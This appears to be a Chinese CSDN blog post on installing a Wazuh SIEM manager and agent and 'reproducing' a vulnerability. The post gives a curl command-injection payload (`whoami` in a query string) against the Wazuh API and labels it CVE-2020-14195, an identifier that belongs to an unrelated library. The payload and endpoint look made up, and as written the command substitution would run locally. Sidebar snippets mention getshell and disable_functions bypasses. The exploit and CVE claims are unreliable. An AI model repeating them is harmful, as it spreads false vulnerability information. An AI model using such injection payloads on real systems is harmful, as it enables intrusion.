配置Wazuh环境并漏洞复现实验

最新推荐文章于 2024-05-01 22:29:47 发布
最新推荐文章于 2024-05-01 22:29:47 发布
阅读量270 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53960460/article/details/132466092
版权

Wazuh是一个开源的安全信息和事件管理(SIEM)平台,用于监控和分析实时安全事件。在本文中,我们将探讨如何配置Wazuh环境,并进行一个简单的漏洞复现实验。我们将在Ubuntu操作系统上完成整个过程。

步骤1:安装和配置Wazuh服务器

  1. 首先,我们需要安装Wazuh服务器。在终端中执行以下命令:
sudo apt-get update
sudo apt-get install curl apt-transport-https lsb-release -y
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | sudo apt-key add -
echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | sudo tee /etc/apt/sources.list.d/wazuh.list
sudo apt-get update
sudo apt-get install wazuh-manager -y

  1. 安装完成后,编辑Wazuh服务器配置文件/var/ossec/etc/ossec.conf,配置监听IP地址和端口,使其可以接收代理节点(主机)的日志。

  2. 重启Wazuh管理器以应用配置更改:

sudo systemctl restart wazuh-manager

步骤2:设置Wazuh代理

  1. 在另一台机器上,作为Wazuh代理,重复步骤1中的第一步,安装Wazuh代理。

  2. 在Wazuh代理上的配置文件/var/ossec/etc/ossec.conf中,将<client>部分的<server-ip>更改为Wazuh服务器的IP地址。

sudo systemctl restart wazuh-agent

步骤3:漏洞复现实验

在本实验中,我们将使用Wazuh中的一个已知漏洞进行复现:CVE-2020-14195(Wazuh API命令注入漏洞)。

  1. 打开终端,执行以下命令以利用该漏洞执行任意命令:
curl -X GET "http://<Wazuh-Server-IP>:55000/d/?c=`whoami`"

这将向受影响的Wazuh API发送一个包含恶意注入的请求,返回当前用户的用户名。

  1. 修复漏洞:前往Wazuh GitHub存储库,查找并应用相关的补丁,然后重新部署Wazuh管理器和代理。

结论

通过完成上述步骤,我们成功地配置了Wazuh环境,并且在实验中复现了一个漏洞。Wazuh作为一个功能强大的开源安全监控工具,可以帮助组织监视和应对安全事件。然而,这也强调了保持软件更新和修补漏洞的重要性,以确保系统的安全性和稳定性。

关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Wazuh server 服务的配置管理
watermelonbig的专栏
08-10 1001
/Wazuh可以按需和外部的其他事件管理、监控报警管理平台进行集成,自动地将将定级别或类别的报警消息发送到第三方的平台上去,以实现统一的事件管理。编辑/var/ossec/etc/ossec.conf文件,使用remote标签可以自定义服务监听使用的本地ip地址。...
wazuh环境配置漏洞复现
Senvenhu的博客
08-23 174
因为没有给wazuh设置代理,centos上监控不到,因为没给定埋点,没有像远控木马一样的工具。这里的埋点就是把代理的一个软件装到代理的端点上 在wazuh上选择监控的客户机类型。我们在getshell之后,就是bypass disable_function,这里使用LD_Preload来bypass。当它与包含函数结合时,php://filter流会被当作php文件执行。代码读取出来然后再用包含函数include结合即可,因此再上传。代码读取出来然后再用包含函数include结合即可,因此再上传。
2024年网络安全最新Wazuh从入门到上线(1)
最新发布
2401_84297899的博客
05-01 201
name=Elasticsearch repository for 7.x packages baseurl=https://artifacts.elastic.co/packages/7.x/yum gpgcheck=1 gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch enabled=1 autorefresh=1 type=rpm-md EOFyum makecache yum upgrade -yyum install -y wazu
HIDS-wazuh配置和防御
weixin_67259816的博客
08-23 353
原文链接:https://blog.csdn.net/vt_yjx/article/details/132416509。告警信息:/var/ossec/logs/alerts/alerts.log,有两个格式,json格式是给计算机看的。先在客户端配置文件中/var/ossec/etc/ossec.conf添加要监控的日志。规则:/var/ossec/ruleset/rules,不建议修改。配置文件:/var/ossec/etc/ossec.conf。路径:/var/ossec/bin。
wazuh应用之主机安装agent及触发告警邮件
Cheney_My的博客
12-10 1048
server端: #/var/ossec/bin/manage_agent agent端: 安装Wazuh agent 添加Wazuh存储库: #rpm --import https://packages.wazuh.com/key/GPG-KEY-WAZUH #cat > /etc/yum.repos.d/wazuh.repo <<\EOF [wazuh_repo] gpgcheck=1 gpgkey=https://packages.wazuh.com/key/GPG-KEY-W
WAZUH-OSSEC:WAZUH-开源安全平台安装
02-03
通过以上步骤,你已经在 CentOS8 上成功安装并配置WAZUH-OSSEC 开源安全平台,它可以提供实时的威胁检测和日志分析。结合 ELK 堆栈,你将能够更有效地管理和响应潜在的安全事件。记得定期更新 WAZUH-OSSEC 和相关...
Wazuh和clamav的联动 -操作记录.docx
09-14
5. 卸载并重新安装Wazuh代理,以应用配置更改:`yum remove wazuh-agent`,然后重新执行安装步骤。 6. 重启代理服务:`sudo systemctl restart wazuh-agent` **Wazuh与ClamAV联动** Wazuh可以通过集成ClamAV来增强...
wazuh-ruleset:Wazuh-规则集
02-03
1. **Agent**: 安装在被监控系统上的轻量级代理,负责收集系统事件、文件完整性检查、网络流量分析等,并将这些信息发送到Wazuh服务器。 2. **Server**: 接收并处理来自代理的数据,执行规则引擎进行分析,提供报警...
wazuh-documentation:Wazuh-项目文档
02-03
您也可以通过发送电子邮件至wazuh+subscribe@googlegroups.com加入我们的,以提出问题并参与讨论。使用的软件和库 3.5+ 3.0.4 0.9.2 1.1.13版权和许可版权所有:copyright:2020 Wazuh,Inc. Wazuh是免费软件; 您...
wazuh-elastic7-template-alerts.json
06-29
wazuh-elastic7-template-alerts.json,wazuh的ES模块导入
网络安全--wazuh环境配置漏洞复现
m0_68976043的博客
08-20 4107
1.1进入官网下载OVA启动软件1.2点击启动部署,傻瓜式操作1.3通过账号:wazuh-user,密码:wazuh进入wazuh1.4将桥接模式更改为仅nat模式1.5更改配置之后输入重新启动命令 service network restart查看自身ipip a1.6配置已好,本地开启小皮Apache直接访问1.7有时会因为网络问题出现如下问题,我们采用重启wazuh即可。
Wazuh从入门到上线,GitHub重磅官宣
2401_83947353的博客
04-14 1051
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
wazuh中针对文件包含漏洞是如何制定规则检测的
09-24
Wazuh针对文件包含漏洞的检测是通过制定规则来实现的。规则是一系列条件和操作的组合,当满足条件时,就会执行操作。在Wazuh中,规则由以下几部分组成: 1.条件:规则中的条件是指需要满足的安全事件或日志条目,可以基于事件的内容、源地址、目标地址、时间等方面进行筛选。 2.操作:规则中的操作是指需要执行的操作,可以是发送警报、执行脚本、发送电子邮件等。 针对文件包含漏洞Wazuh的规则通常基于以下几个方面: 1. 文件路径:检查是否存在可疑的文件路径,例如包含了敏感信息的文件路径。 2. 文件名:检查是否存在可疑的文件名,例如包含了敏感信息的文件名。 3. 文件内容:检查文件是否包含了可疑的内容,例如包含了敏感信息的代码片段。 4. 访问日志:检查是否存在可疑的访问日志,例如频繁访问某个文件或目录。 5. 安全事件:检查是否存在与文件包含漏洞相关的安全事件,例如系统漏洞利用、恶意软件下载等。 Wazuh会根据这些规则来监控文件系统的变化,当检测到可疑的活动时,便会触发相应的警报,帮助管理员及时发现和应对文件包含漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值